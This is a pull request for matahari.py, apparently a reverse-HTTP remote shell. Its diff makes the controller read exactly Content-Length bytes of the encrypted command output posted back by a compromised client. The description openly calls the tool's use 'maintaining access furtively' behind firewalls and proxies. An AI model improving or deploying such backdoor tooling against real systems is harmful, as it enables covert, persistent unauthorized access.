### PR TITLE
Fix POST data read bug on some NATed/slow networks

### DIFF
--- a/matahari.py
+++ b/matahari.py
@@ -178,15 +178,16 @@ class myRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 		global command_output, output_ready, timestamp, salt, password
 		if verbose: print "received output for command: "+ last_command
 		if verbose: print "now decoding it..."
+		content_length = int(self.headers["content-length"])
 		if encrypt:
 			if verbose: print " decrypting using salt: "+salt
 			# create hash of password + salt
 			hasher = SHA.new()
 			hasher.update(password + salt)
 			rc4 = ARC4.new(hasher.hexdigest()) # use a hash for password to avoid weak key scheduling 
-			content = self.rfile.read() # read payload
+			content = self.rfile.read(content_length) # read payload
 			command_output = rc4.decrypt(base64.b64decode(content))	# decrypt payload
-		else: command_output = base64.b64decode(self.rfile.read()) # payload is not encrypted
+		else: command_output = base64.b64decode(self.rfile.read(content_length)) # payload is not encrypted
 		output_ready = True 
 		# Check special header to know client current polling period
 		if "Next-Polling-In" in self.headers:


### PR DESCRIPTION
A common usage scenario of matahari is maintaining access furtively.

When matahari client is run from a remote machine behind a firewall and http proxy,
it is more relevant to specify how many bytes from POSTDATA will be read.

Indeed, some http proxy servers strip ending "\r\n\r\n", making the socket read() hang out
until sockettimeout is reached.

So i did a small patch that reads exactly "Content-Length" bytes.
